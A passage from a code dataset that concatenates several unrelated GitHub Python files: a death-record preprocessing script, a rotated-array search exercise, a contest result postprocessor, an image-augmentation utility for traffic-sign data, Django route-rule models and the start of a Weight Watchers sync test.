0\n        M = Married = 1\n        W = Widowed = 2\n        D = Divorced = 3\n        U = Marital Status unknown = 4'''\n        if(i == 15):\n            c15 = []\n            for rowData in dataMatrix[:, i]:\n                if(rowData == 'S'):\n                    c15.append(0)\n                elif(rowData == 'M'):\n                    c15.append(1)\n                elif(rowData == 'W'):\n                    c15.append(2)\n                elif(rowData == 'D'):\n                    c15.append(3)\n                elif(rowData == 'U'):\n                    c15.append(4)\n        \n        '''Column 18 = InjuryAtWork\n        Y = Yes = 0\n        N = No = 1\n        U = Unknown = 2'''\n        if(i == 18):\n            c18 = []\n            for rowData in dataMatrix[:, i]:\n                if(rowData == 'Y'):\n                    c18.append(0)\n                elif(rowData == 'N'):\n                    c18.append(1)\n                elif(rowData == 'U'):\n                    c18.append(2)\n        \n        '''Column 20 = Method Of Disposition\n        B = Burial = 0\n        C = Cremation = 1\n        O = Other = 2\n        U = Unknown = 3\n        E = Unknown = 3\n        R = Unknown = 3'''\n        if(i == 20):\n            c20 = []\n            for rowData in dataMatrix[:, i]:\n                if(rowData == 'B'):\n                    c20.append(0)\n                elif(rowData == 'C'):\n                    c20.append(1)\n                elif(rowData == 'O'):\n                    c20.append(2)\n                elif(rowData == 'U'):\n                    c20.append(3)\n                elif(rowData == 'E'):\n                    c20.append(3)\n                elif(rowData == 'R'):\n                    c20.append(3)\n                else:\n                    c20.append(3)\n        \n        \n        '''Column 21 = Autopsy: \n        Y = Yes = 0\n        N = No = 1\n        U = Unknown = 2\n        ''' \n        if(i == 21):\n            c21 = []\n            for rowData in dataMatrix[:, i]:\n                if(rowData == 'Y'):\n                    c21.append(0)\n                elif(rowData == 'N'):\n                    c21.append(1)\n                elif(rowData == 'U'):\n                    c21.append(2)\n                else:\n                    c21.append(2)\n    \n    \n    '''replace the values into main matrix''' \n    dataMatrix[:, 6] = c6\n    dataMatrix[:, 15] = c15\n    dataMatrix[:, 18] = c18\n    dataMatrix[:, 20] = c20\n    dataMatrix[:, 21] = c21\n    \n    print('################# changeStringToInteger() finished ##################')\n    print(\"--- %s seconds ---\" % (time.time() - start_time))\n    return dataMatrix\n
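\n# NOTE (editor's addition, an illustrative sketch -- not part of the original script):\n# the per-column if/elif chains above can also be expressed as lookup tables, e.g.\ndef _map_codes_sketch(values, table, default):\n    '''Map each string code in values through table, falling back to default.'''\n    return [table.get(v, default) for v in values]\n# e.g. c20 = _map_codes_sketch(dataMatrix[:, 20], {'B': 0, 'C': 1, 'O': 2, 'U': 3, 'E': 3, 'R': 3}, 3)\n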
\n'''change output variable ICD10 codes into integer values\nExplanation: https://en.wikipedia.org/wiki/ICD-10#List\n''' \n\ndef mapICD10CodetoInteger(ICD10Codes):\n    print('################# mapICD10CodetoInteger() started ##################')\n    start_time = time.time()\n    \n    integerCodes = []\n    for icd10Code in ICD10Codes:\n        if(icd10Code.startswith('A') or icd10Code.startswith('B')):\n            integerCodes.append(0)\n        elif(icd10Code.startswith('C') or icd10Code.startswith('D0') or icd10Code.startswith('D1') or icd10Code.startswith('D2') or icd10Code.startswith('D3') or icd10Code.startswith('D4')):\n            integerCodes.append(1)\n        elif(icd10Code.startswith('D5') or icd10Code.startswith('D6') or icd10Code.startswith('D7') or icd10Code.startswith('D8')):\n            integerCodes.append(2)\n        elif(icd10Code.startswith('E')):\n            integerCodes.append(3)\n        elif(icd10Code.startswith('F')):\n            integerCodes.append(4)\n        elif(icd10Code.startswith('G')):\n            integerCodes.append(5)\n        elif(icd10Code.startswith('H0') or icd10Code.startswith('H1') or icd10Code.startswith('H2') or icd10Code.startswith('H3') or icd10Code.startswith('H4') or icd10Code.startswith('H5')):\n            integerCodes.append(6)\n        elif(icd10Code.startswith('H6') or icd10Code.startswith('H7') or icd10Code.startswith('H8') or icd10Code.startswith('H9')):\n            integerCodes.append(7)\n        elif(icd10Code.startswith('I')):\n            integerCodes.append(8)\n        elif(icd10Code.startswith('J')):\n            integerCodes.append(9)\n        elif(icd10Code.startswith('K')):\n            integerCodes.append(10)\n        elif(icd10Code.startswith('L')):\n            integerCodes.append(11)\n        elif(icd10Code.startswith('M')):\n            integerCodes.append(12)\n        elif(icd10Code.startswith('N')):\n            integerCodes.append(13)\n        elif(icd10Code.startswith('O') or icd10Code.startswith('0')):\n            integerCodes.append(14)\n        elif(icd10Code.startswith('P')):\n            integerCodes.append(15)\n        elif(icd10Code.startswith('Q')):\n            integerCodes.append(16)\n        elif(icd10Code.startswith('R')):\n            integerCodes.append(17)\n        else:\n            print(icd10Code)\n    \n    print('################# mapICD10CodetoInteger() finished ##################')\n    print(\"--- %s seconds ---\" % (time.time() - start_time))\n    \n    return integerCodes\n\n\n'''Be sure about where you have the file and where you want to put the resultant file'''\nactualDataFile = '../data/DeathRecords/DeathRecords.csv'\ndeathRecordsOnlyDiseaseFile = '../processedData/DeathRecordsOnlyDisease.csv'\ndeathRecordsConvertedToIntegerFile = '../processedData/DeathRecordsConvertedToInteger.csv'\nactualBalancedDataFile = '../processedData/balancedDataRaw.csv'\nbalancedDataConvertedToIntegerFile = '../processedData/balancedDataConvertedToInteger.csv'\n\n'''Get and Write only disease data samples'''\n# getOnlyDiseaseData(actualDataFile, deathRecordsOnlyDiseaseFile)\n\n'''transform the data into integer format. only the input features.'''\ncols = [6, 15, 18, 20, 21]\ndataMatrix = changeStringToInteger(actualBalancedDataFile , cols , True) \n \n'''change the output or icd10codes''' \ndataMatrix[ : , 24] = mapICD10CodetoInteger(dataMatrix[:, 24])\n\n'''write the converted values to file'''\nwith open(balancedDataConvertedToIntegerFile, 'w') as csvfile:\n    writer = csv.writer(csvfile , delimiter=',')\n    for row in dataMatrix:\n        writer.writerow(row) \n    \n\n# \n# # #Manner of Death, column 19 \n# '''take manner of death as output value'''\n# Y = dataMatrix[:, 16]\n# \n# '''take inputs up to 31. after 31 the values are not convertible to float'''\n# X = dataMatrix[: , range(0 , 6) ] \n# '''delete column 19. 
i.e. delete deathManner column from input'''\n# #X = np.delete(dataMatrix, [0, 16], axis=1)\n# \n# \n# '''convert to float'''\n# X = dataIO.convertDatatoFloat(X)\n# Y = dataIO.convertDatatoFloat(Y)\n# \n# \n# '''Split into train, test and validation'''\n# trainX, trainY, validationX, validationY, testX, testY = dataIO.splitTrainValidateAndTestData(X, Y, 0.6, 0.2, 0.2)\n# \n# print(trainX.shape, trainY.shape)\n# \n# clf = MLPClassifier()\n# \n# clf.fit(trainX, trainY)\n# \n# predictedY = clf.predict(testX)\n# \n# accuracy = accuracy_score(testY, predictedY)\n# \n# confusionMatrix = confusion_matrix(testY , predictedY)\n# \n# f1Score = f1_score(testY, predictedY, average='weighted')\n# \n# print('confusionMatrix: ', confusionMatrix)\n# print('f1Score: ', f1Score)\n# \n# \n# \n# \n# \n","repo_name":"md-k-sarker/Predicting-Health-Insurance-Cost","sub_path":"src/PreProcessData.py","file_name":"PreProcessData.py","file_ext":"py","file_size_in_byte":10388,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"2"} +{"seq_id":"36521815736","text":"#Devise a way to find an element in the rotated array in O(log n) time.\n\ndef findPivot(arr:list, haystack: list, needle: any):\n    print(haystack, end=\"\\t\")\n    sizeOfList = len(haystack)\n    print(\"size => \", sizeOfList, end=\"\\t\")\n    if sizeOfList <= 1:\n        return -1\n\n    middleIndex = sizeOfList//2\n    middleIndexEle = haystack[middleIndex]\n\n    print(middleIndex, middleIndexEle, sep=\" => \")\n    \n    # print(type(needle), middleIndex, type(haystack[middleIndex]), sep=' => ')\n    if (needle == middleIndexEle):\n        # print('===========================================')\n        return middleIndex + (sizeOfList-1)\n    elif needle < middleIndexEle:\n        return findPivot(arr, arr[middleIndex::], needle)\n    elif needle > middleIndexEle:\n        return findPivot(arr, arr[0:middleIndex], needle)\n    \n\n\n# def searchEle(arr, meedle, index):\n\nif __name__ == '__main__':\n    l = list(map(int,input('Enter space separated values: ').split(' ')))\n    d = int(input(f'please enter a number to search : '))\n    \n    r = findPivot(l, l, d)\n    print(r)\n","repo_name":"pawanab/python-ds","sub_path":"problem-solving/search-in-sorted-roated-list.py","file_name":"search-in-sorted-roated-list.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"38781509714","text":"#!/usr/bin/python\n\nimport simplejson as json\nfrom sys import stdin, stderr, stdout\nimport traceback\nimport re\nimport sys\n\n\ndef getVerdicts(tests, testData):\n    verdicts = {}\n    for i in tests:\n        s = testData[i-1][\"verdict\"]\n        if s not in verdicts:\n            verdicts.update({s : 0})\n        verdicts.update({s : verdicts[s] + 1})\n    return ','.join(['%d %s' % (verdicts[j], j) for j in verdicts])\n\n\ndef getIfHas(d, v):\n    if v in d:\n        return d[v]\n    return None\n\ntry:\n    testData = json.load(stdin)[\"tests\"]\n\n    important = [\"testName\", \"verdict\", \"message\"]\n    tests = [ {j : getIfHas(i,j) for j in important} for i in testData]\n\n    tests.sort(key = lambda x : x [\"testName\"])\n    tests = [ tests[i] for i in range(len(tests)) if i == 0 or tests[i][\"testName\"] != tests[i-1][\"testName\"] ]\n\n    answer = re.findall(\"\\$.*\\$\", tests[0][\"message\"].replace('\\n', ' '))\n    if (len(answer) != 0):\n        stdout.write(answer[0].replace(\"$\",\"\") + '\\n')\n    # sys.exit(4)\n\nexcept Exception as e:\n    stdout.write('\\n')\n    
traceback.print_exc(file=stderr)\n","repo_name":"atolstikov/yacontest-cheatsheet","sub_path":"ml-score-prediction/postprocessor.py","file_name":"postprocessor.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"2"} +{"seq_id":"38223429036","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n\n    @ Author : pengj\n    @ date : 2020/7/23 14:14\n    @ IDE : PyCharm\n    @ GitHub : https://github.com/JackyPJB\n    @ Contact : pengjianbiao@hotmail.com\n-------------------------------------------------\n    Description : \n-------------------------------------------------\n\"\"\"\n\n__author__ = 'Max_Pengjb'\n\nimport numpy as np\nimport cv2\nimport os\nimport time\nimport xml.etree.ElementTree as ET\nfrom opencv_learn.my_perspective_transform import perspective_transform\nfrom opencv_learn.my_flip import flip_x\nfrom opencv_learn.draw_boxes import draw_boxes, draw_boxes_with_labels\nfrom opencv_learn.my_crop_scale import crop_scale\nfrom opencv_learn.my_save_jpg_xml import save_jpg_xml\n\nimport json\n\nallFileNum = 0\n\n\ndef get_all_jgp_xml_couple(folder_path: str) -> list:\n    \"\"\"\n    :param folder_path: directory to read files from\n    :return: all (image, xml annotation) pairs\n    \"\"\"\n    # all files\n    file_xml_couple_dict = dict()\n    # returns a list containing the names of the entries in the directory\n    files = os.listdir(folder_path)\n    for file_name in files:\n        # keep the entry if it is an xml or an image (jpg, png, ...)\n        if os.path.isfile(folder_path + '/' + file_name):\n            name, file_type = os.path.splitext(file_name)\n            if name not in file_xml_couple_dict:\n                # first time an image or xml with this name appears\n                file_xml_couple_dict[name] = [None, None]\n            # decide whether the file is an image or an annotation xml\n            if file_type in {'.jpg', '.png', '.jpeg'}:\n                # more extensions can be added here\n                if file_xml_couple_dict[name][0] is not None:\n                    print('The folder contains more than one image named ', file_xml_couple_dict[name], ', please check!')\n                else:\n                    file_xml_couple_dict[name] = [file_name, file_xml_couple_dict[name][1]]\n            elif file_type in {'.xml'}:\n                # annotation file\n                file_xml_couple_dict[name] = [file_xml_couple_dict[name][0], file_name]\n    # print(file_xml_couple_dict)\n    return list(file_xml_couple_dict.values())\n\n\ndef get_all_xmls(folder_path: str) -> list:\n    \"\"\"\n    :param folder_path: directory to read files from\n    :return: all xml annotation files\n    \"\"\"\n    # all files\n    xmls = []\n    # returns a list containing the names of the entries in the directory\n    files = os.listdir(folder_path)\n    for file_name in files:\n        # keep the entry if it is an xml\n        if os.path.isfile(os.path.join(folder_path, file_name)):\n        
    _, file_type = os.path.splitext(file_name)\n            if file_type in {'.xml'}:\n                xmls.append(file_name)\n    return xmls\n\n\n# Python: read all files under a directory\ndef printPath(level, path):\n    global allFileNum\n    ''' \n    print all folders and files under a directory \n    '''\n    # all folders; the first field is the level of this directory\n    dirList = []\n    # all files\n    fileList = []\n    # returns a list containing the names of the entries in the directory\n    files = os.listdir(path)\n    # add the directory level first\n    dirList.append(str(level))\n    for f in files:\n        if os.path.isdir(path + '/' + f):\n            # skip hidden folders, since there are too many of them\n            if f[0] == '.':\n                pass\n            else:\n                # add non-hidden folders\n                dirList.append(f)\n        if os.path.isfile(path + '/' + f):\n            # add files\n            fileList.append(f)\n    # used as a flag: the first level of the folder list is not printed\n    i_dl = 0\n    for dl in dirList:\n        if i_dl == 0:\n            i_dl = i_dl + 1\n        else:\n            # print to the console (directories other than the first)\n            print('- ' * (int(dirList[0])), dl)\n            # recurse into the folder, directory level + 1\n            printPath((int(dirList[0]) + 1), path + '/' + dl)\n    for fl in fileList:\n        # print the file\n        print('- ' * (int(dirList[0])), fl)\n        # keep a rough count of how many files there are\n        allFileNum = allFileNum + 1\n\n\n# Save an image; the image's four corners are stored as metadata. When saving the original image, the vertex info is left unprocessed for now\ndef save_img(save_dir: str, img: np.array, points=None):\n    # save_dir = 
os.path.dirname(img_path)\n    # if not os.path.exists(os.path.dirname(save_path)):\n    if not os.path.exists(save_dir):\n        os.mkdir(save_dir)\n    k = len(os.listdir(save_dir))\n    img_path = os.path.join(save_dir, str(k) + '.jpg')\n    cv2.imwrite(img_path, img)\n    if 'pic_classes' not in save_dir:\n        json_dir = os.path.join(save_dir, 'json')\n        if not os.path.exists(json_dir):\n            os.mkdir(json_dir)\n        if points is not None:\n            h, w = img.shape[0:2]\n            points = [[0, 0], [w - 1, 0], [w - 1, h - 1], [0, h - 1]]\n            # rr = cv2.fillPoly(img, [np.array(points, dtype=np.int32)], 255)\n            # cv2.imshow('rrrrrrr', rr)\n        json_path = os.path.join(json_dir, str(k) + '.json')\n        with open(json_path, 'w', encoding='utf8') as fp:\n            fp.write(json.dumps({'points': points}))\n\n\ndef background_target_generator(img_path, save_folder, type_tangels):\n    \"\"\"\n    Cut the target regions out of the image, and recover the background left after the target regions are removed\n    :param img_path: path of the source image\n    :param save_folder: folder where generated images are saved\n    :param type_tangels: an array of [detection_type, xmin, ymin, xmax, ymax] entries\n    :return: None\n    \"\"\"\n    cur_img = cv2.imread(img_path)\n    # h, w = cur_img.shape[0:2]\n    # print('h, w',cur_img.shape)\n    # mask for cutting out the background\n    # mask = np.ones(cur_img.shape)\n    for rec in type_tangels:\n        # rec format: [detection_type, xmin, ymin, xmax, ymax]\n        xmin, ymin, xmax, ymax = rec[1:5]\n        # crop the target out of the image by xmin, ymin, xmax, ymax, then save it\n        target_img = cur_img[ymin:ymax, xmin:xmax]\n        save_dir = os.path.join(save_folder, rec[0])\n        cv2.imshow('target_img', target_img)\n        save_img(save_dir, target_img)\n        # TODO fill the removed regions; this part does not work well yet -- look at other people's algorithms!\n        # y1, y2 = ymin, ymax\n        # step = 1\n        # while y1 < y2:\n        #     if ymin - k >= 0:\n        #         cur_img[y1:y1 + k, xmin:xmax] = cur_img[ymin - k:ymin, xmin:xmax]\n        #         y1 = y1 + k\n        #     if ymax + k < h:\n        #         cur_img[y2 - k:y2, xmin:xmax] = cur_img[ymax:ymax + k, xmin:xmax]\n        #         y2 = y2 - k\n        #     step <<= 2\n        # w_, h_ = xmax - xmin, ymax - ymin\n        # w1, w2, h1, h2 = max(0, xmin - w_ // 2), min(w - 1, xmax + w_ // 2), max(0, ymin - h_ // 2), min(h - 1, ymax + h_ // 2)\n        # cur_img[h1:h2, w1:w2] = cv2.medianBlur(cur_img[h1:h2, w1:w2], 3)\n        cur_img[ymin:ymax, xmin:xmax] = 0  # after cutting the target out, blank the region in the original image (black/0)\n    cv2.waitKey()\n    save_img(save_folder + 'background/', cur_img)\n\n\ndef augmentation(save_dir, img_path):\n    if not os.path.exists(save_dir):\n        os.mkdir(save_dir)\n    json_dir = os.path.join(save_dir, 'json')\n    if not os.path.exists(json_dir):\n        os.mkdir(json_dir)\n    image = cv2.imread(img_path)\n    # the four vertices of the original image\n    # th, tw = image.shape[0:2]\n    # vertexes = np.array([(0, 0), (tw - 1, 0), (tw - 1, th - 1), (0, th - 1)], dtype=np.float32)\n    # TODO perspective-transform strategy\n    for x in range(-45, 45, 20):\n        # perspective_transform returns an image plus its 4 vertices [[x,y],]\n        # apply an image transform here; it must return the transformed image plus the transformed vertex coordinates\n        trans_img, points = perspective_transform(image, x, 0, 0)\n        save_img(save_dir, trans_img)\n    for y in range(-45, 45, 20):\n        # perspective_transform returns an image plus its 4 vertices [[x,y],]\n        # apply an image transform here; it must return the transformed image plus the transformed vertex coordinates\n        trans_img, points = perspective_transform(image, 0, y, 0)\n        save_img(save_dir, trans_img)\n    # TODO flip (horizontal) + translation + scaling\n    # horizontal flip: only traffic lights and lane lines are flipped; speed-limit signs are not\n    do_flip = []\n\n    trans_img, _ = flip_x(image)\n    save_img(save_dir, trans_img)\n\n    # TODO scaling\n\n\n# parse the xml file and extract the bounding-box parts into rectangles\ndef parse_xml_bboxes(xml_path):\n    \"\"\"\n    Parse the xml; the xml and the jpg must be in the same directory\n    :param xml_path: path of the xml file\n    :return: rectangles :(image_path, [detection_type, xmin, ymin, xmax, ymax])\n    \"\"\"\n    # xml.etree.ElementTree can parse an xml file directly\n    tree = ET.parse(xml_path)\n    root = tree.getroot()\n    # for child in root:\n    #     print(child.attrib,child.text)\n    # for elem in tree.iter():\n    #     
print(elem.tag, elem.attrib, elem.text)\n # Element.findall() 仅查找当前元素的直接子元素中带有指定标签的元素。\n # Element.find() 找带有特定标签的 第一个 子级,然后可以用 Element.text 访问元素的文本内容\n pic_name_node = root.find('filename')\n pic_name = pic_name_node.text\n # 这里处理德江留下来的坑。\n _, xml_name = os.path.split(xml_path)\n if xml_name.startswith('x') and not pic_name.startswith('x'):\n pic_name = 'x' + pic_name\n rectangles = []\n # 遍历所有 object\n for obj in root.findall('object'):\n detection_type = obj.find('name').text\n xmin = int(obj.find('bndbox').find('xmin').text)\n ymin = int(obj.find('bndbox').find('ymin').text)\n xmax = int(obj.find('bndbox').find('xmax').text)\n ymax = int(obj.find('bndbox').find('ymax').text)\n rectangles.append([detection_type, xmin, ymin, xmax, ymax])\n return os.path.join(os.path.dirname(xml_path), pic_name), rectangles\n\n\ndef my_augmentation(imgs_folder, save_expand, names):\n if not os.path.exists(save_expand):\n os.mkdir(save_expand)\n cnt = 0 # 记录一下一起生成了多少图片\n xml_names = []\n for file in names:\n print('-' * 8 + ' 进程 ' + str(os.getpid()) + ' 正在处理 ' + '-' * 2 + file + '-' * 3)\n res_list = []\n # rectangles :[ [detection_type, xmin, ymin, xmax, ymax],]\n # xml 和 jpg 必须在同级目录\n pic_path, rectangles = parse_xml_bboxes(os.path.join(imgs_folder, file))\n bboxes = list(map(lambda x: [x[1], x[2], x[3], x[4]], rectangles))\n labels = list(map(lambda x: x[0], rectangles))\n # 做一下翻转看看 flip_x 要求传入的 boxes 格式: [ [[x,y],[x,y]], [[x,y],[x,y]]……]\n # 翻转只针对斑马线,红绿灯,如果包含 限速就不翻转了\n no_need_flip_class_names = {\"speed_limited\", \"speed_unlimited\"}\n CROP_NUMS = 10 # 使用 放大 裁剪 需要生成多少张图\n if not set(labels) & no_need_flip_class_names: # 交集为空,就说明不存在了 限速标,可以翻转\n flip_img, flip_boxes = flip_x(pic_path, list(map(lambda x: [[x[1], x[2]], [x[3], x[4]]], rectangles)))\n # 展示一下\n # draw_image = draw_boxes_with_labels(flip_img, flip_boxes, labels)\n # cv2.imshow(\"draw_image\", draw_image)\n # 保存,翻转不影响 labels\n res_list.append([flip_img, flip_boxes, labels])\n # 翻转了后,也再做一下裁剪扩充数据吧\n flip_crop_scale_res_list = crop_scale(flip_img, flip_boxes, labels, nums=CROP_NUMS)\n res_list.extend(flip_crop_scale_res_list)\n # 这里做一下 放大后裁剪,返回的是 nums 个图片+bboxes+labels: 【[image,bboxes,labels],[image,bboxes,labels]……】\n crop_scale_res_list = crop_scale(pic_path, bboxes, labels, nums=CROP_NUMS)\n res_list.extend(crop_scale_res_list)\n # 保存 图片 + bboxes + label 成个 jgp + xml 格式\n for res_image, res_boxes, res_labels in res_list:\n xml_name = save_jpg_xml(save_expand, res_image, res_boxes, res_labels)\n xml_names.append(xml_name)\n cnt += len(res_list)\n return cnt, xml_names\n\n\nif __name__ == '__main__':\n import time\n\n start_time = time.time()\n save_folder = './pic_classes/'\n # imgs_folder = './photo/'\n imgs_folder = r'D:\\car_data_origin\\data_7_22'\n # imgs_folder = r'D:\\car_data_origin\\test'\n # save_expand = './expand'\n save_expand = r'D:\\car_data'\n # 引入多进程加快速度\n from multiprocessing import cpu_count\n from multiprocessing import Pool\n\n CPU_COUNT = cpu_count() # CPU内核数 本机为 6\n pool = Pool(processes=CPU_COUNT)\n # printPath(1, './photo/')\n # print('总文件数 =', allFileNum)\n # file_names = get_all_jgp_xml_couple(imgs_folder)\n file_names = get_all_xmls(imgs_folder)\n N = len(file_names)\n sepList = [[i * (N // CPU_COUNT), (i + 1) * (N // CPU_COUNT)] for i in range(0, CPU_COUNT)]\n sepList[CPU_COUNT - 1][1] = N\n print(sepList)\n\n result = []\n for i in range(CPU_COUNT):\n # TODO 保存为文件的名字,我想要用共享变量来做,现在是通过不同的进行保存在不同的文件夹,有点笨,这个需要增加共享变量来处理\n result.append(pool.apply_async(my_augmentation,\n (imgs_folder, os.path.join(save_expand, 
str(i)),\n file_names[sepList[i][0]:sepList[i][1]])))\n pool.close()\n pool.join()\n list1 = [res.get()[0] for res in result]\n print(sum(list1), end='') # end='' 表示取消 /n\n \"\"\"\n cnt = 0 # 记录一下一起生成了多少图片\n for i, file in enumerate(file_names):\n res_list = []\n # rectangles :[ [detection_type, xmin, ymin, xmax, ymax],]\n # xml 和 jpg 必须在同级目录\n pic_path, rectangles = parse_xml_bboxes(os.path.join(imgs_folder, file))\n bboxes = list(map(lambda x: [x[1], x[2], x[3], x[4]], rectangles))\n labels = list(map(lambda x: x[0], rectangles))\n # 做一下翻转看看 flip_x 要求传入的 boxes 格式: [ [[x,y],[x,y]], [[x,y],[x,y]]……]\n # 翻转只针对斑马线,红绿灯,如果包含 限速就不翻转了\n no_need_flip_class_names = {\"speed_limited\", \"speed_unlimited\"}\n CROP_NUMS = 10 # 使用 放大 裁剪 需要生成多少张图\n if not set(labels) & no_need_flip_class_names: # 交集为空,就说明不存在了 限速标,可以翻转\n flip_img, flip_boxes = flip_x(pic_path, list(map(lambda x: [[x[1], x[2]], [x[3], x[4]]], rectangles)))\n # 展示一下\n # draw_image = draw_boxes_with_labels(flip_img, flip_boxes, labels)\n # cv2.imshow(\"draw_image\", draw_image)\n # 保存,翻转不影响 labels\n res_list.append([flip_img, flip_boxes, labels])\n # 翻转了后,也再做一下裁剪扩充数据吧\n flip_crop_scale_res_list = crop_scale(flip_img, flip_boxes, labels, nums=CROP_NUMS)\n res_list.extend(flip_crop_scale_res_list)\n # 这里做一下 放大后裁剪,返回的是 nums 个图片+bboxes+labels: 【[image,bboxes,labels],[image,bboxes,labels]……】\n crop_scale_res_list = crop_scale(pic_path, bboxes, labels, nums=CROP_NUMS)\n res_list.extend(crop_scale_res_list)\n # 保存 图片 + bboxes + label 成个 jgp + xml 格式\n for res_image, res_boxes, res_labels in res_list:\n save_jpg_xml(save_expand, res_image, res_boxes, res_labels)\n cnt += len(res_list)\n # for i, (res_image, res_boxes, res_labels) in enumerate(res_list):\n # # 显示出来看看\n # print('res_boxes', res_boxes)\n # image = draw_boxes_with_labels(res_image, res_boxes, res_labels)\n # cv2.imshow('after_draw_' + str(i), image)\n # 切割数据,把背景切到 pic_classes/background ,把labels 切到对应 label 名的目录pic_classes/'$label'\n # TODO 这个 部分先暂时不弄了 这个是准备用来抠图然后贴上去搞\n # background_target_generator(pic_path, save_folder, rectangles)\n # 调用数据增强方法\n generator_dir = './generator'\n for folder in os.listdir(save_folder):\n if folder == 'background':\n break\n target_label_folder = os.path.join(save_folder, folder)\n for image_name in os.listdir(target_label_folder):\n target_image_path = os.path.join(target_label_folder, image_name)\n label_generator_dir = os.path.join(generator_dir, folder)\n if not os.path.exists(label_generator_dir):\n os.mkdir(label_generator_dir)\n # augmentation(label_generator_dir, target_image_path)\n cv2.destroyAllWindows()\n print('-' * 10 + ' done ' + '-' * 5 + ' gennerate ' + str(cnt) + ' images' + '-' * 3)\n \"\"\"\n end_time = time.time()\n print('Running time: %s Seconds' % (end_time - start_time))\n","repo_name":"Max-PJB/python-learning","sub_path":"opencv_learn/cv_utils.py","file_name":"cv_utils.py","file_ext":"py","file_size_in_byte":17289,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"1554051039","text":"from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils import timezone\nfrom server_data_conf.models.cluster_conf import ClusterConfig\nfrom product.models import Product\nfrom django.conf import settings\nimport json\nimport os\n\n\nclass RouteRuleQuerySet(models.QuerySet):\n pass\n\n\nclass RouteRuleManager(models.Manager):\n def get_queryset(self):\n return RouteRuleQuerySet(self.model, using=self._db)\n\n def get_by_id(self, id):\n return 
self.get_queryset().filter(id=id).first()\n\n def json(self):\n res = {}\n for v in self.get_queryset().filter(Enabled=True):\n if v.Porduct.Name in res.keys():\n res[v.Porduct.Name].append(v.json())\n else:\n res[v.Porduct.Name] = [\n v.json()\n ]\n return res\n\n\nclass RouteRule(models.Model):\n Porduct = models.ForeignKey(Product, verbose_name=_('Porduct'), on_delete=models.CASCADE)\n ClusterName = models.OneToOneField(ClusterConfig, verbose_name=_('ClusterName'), on_delete=models.CASCADE)\n Cond = models.CharField(_('Cond'), max_length=64)\n\n Enabled = models.BooleanField(default=True)\n CreateDate = models.DateTimeField(_('Create Date'), default=timezone.now)\n\n objects = RouteRuleManager()\n\n # ClusterName = models.OneToOneField\n def __str__(self):\n return self.Porduct.Name + \"_\" + self.CreateDate.strftime('%Y-%m-%d %H:%M:%S')\n\n def disable(self):\n self.Enabled = False\n self.save()\n\n def enable(self):\n self.Enabled = True\n self.save()\n\n def json(self):\n return {\n \"Cond\": self.Cond,\n \"ClusterName\": self.ClusterName.ClusterName,\n }\n\n class Meta:\n db_table = 'RouteRule'\n verbose_name = _('Route Rule')\n verbose_name_plural = _('Route Rule')\n\n def save(self, *args, **kwargs):\n if not self.pk:\n try:\n p = RouteRule.objects.get(id=self.id)\n self.pk = p.pk\n except RouteRule.DoesNotExist:\n pass\n\n super(RouteRule, self).save(*args, **kwargs)\n\n\nclass RouteRuleDataQuerySet(models.QuerySet):\n pass\n\n\nclass RouteRuleDataManager(models.Manager):\n def get_queryset(self):\n return RouteRuleDataQuerySet(self.model, using=self._db)\n\n def get_by_id(self, id):\n return self.get_queryset().filter(id=id).first()\n\n def tofile(self, id):\n data = self.get_queryset().filter(id=id).first()\n if data:\n s = data.json()\n else:\n s = {\n \"Version\": \"nil\",\n \"ProductRule\": {},\n }\n with open(os.path.join(settings.BASE_DIR, 'conf', 'server_data_conf', 'route_rule.data'), 'w')as file:\n file.write(json.dumps(s))\n\n\nclass RouteRuleData(models.Model):\n Name = models.CharField(_('Name'), max_length=64)\n RouteRule = models.ManyToManyField(RouteRule, verbose_name=_('RouteRule'))\n Enabled = models.BooleanField(default=True)\n CreateDate = models.DateTimeField(_('Create Date'), default=timezone.now)\n\n objects = RouteRuleDataManager()\n\n def __str__(self):\n if self.Enabled:\n return self.Name + \"_\" + self.CreateDate.strftime('%Y-%m-%d %H:%M:%S')\n else:\n return \"!!!Disabled_\" + self.Name + \"_\" + self.CreateDate.strftime('%Y-%m-%d %H:%M:%S')\n\n class Meta:\n db_table = 'RouteRuleData'\n verbose_name = _('Route Rule Data')\n verbose_name_plural = _('Route Rule Data')\n\n def save(self, *args, **kwargs):\n if self.Enabled:\n RouteRuleData.objects.filter(Name=self.Name, Enabled=True).update(Enabled=False)\n if not self.pk:\n try:\n p = RouteRuleData.objects.get(id=self.id)\n self.pk = p.pk\n except RouteRuleData.DoesNotExist:\n pass\n\n super(RouteRuleData, self).save(*args, **kwargs)\n\n def json(self):\n res = {}\n for v in self.RouteRule.filter(Enabled=True):\n if v.Porduct.Name in res.keys():\n res[v.Porduct.Name].append(v.json())\n else:\n res[v.Porduct.Name] = [\n v.json()\n ]\n return {\n \"Version\": self.__str__(),\n \"ProductRule\": res,\n }\n\n def tofile(self):\n with open(os.path.join(settings.BASE_DIR, 'conf', 'server_data_conf', 'route_rule.data'), 'w')as file:\n 
file.write(json.dumps(self.json()))\n","repo_name":"power-ops/BFE-UI","sub_path":"bfe/server_data_conf/models/route_rule.py","file_name":"route_rule.py","file_ext":"py","file_size_in_byte":4552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"16514894912","text":"import datetime\nimport json\n\nimport vcr\nfrom tests.conftest import CASSETTES_HOME, FIXTURES_HOME\nfrom wwsync.weight_watchers import get_foods_for_day, get_nutrition, WW_FOOD, get_food_detail, WW_RECIPE, \\\n get_nutrition_info_for_day\n\n\ndef test_get_food_for_week(session):\n with vcr.use_cassette(\"{}/{}.yaml\".format(CASSETTES_HOME, 'food_for_2016_02_12')):\n foods = get_foods_for_day(session, datetime.datetime(2016, 2, 12))\n assert len(foods) == 15\n # These are the keys I expect\n food = foods[0]\n assert all(x in food for x in ['_id', 'versionId', 'portionName', 'portionSize'])\n\n\ndef test_get_calories_ww_defined_food(session):\n with vcr.use_cassette(\"{}/{}.yaml\".format(CASSETTES_HOME, 'egg_log.yaml')):\n # This object is actually quite more complicated. But I don't care\n food_log = 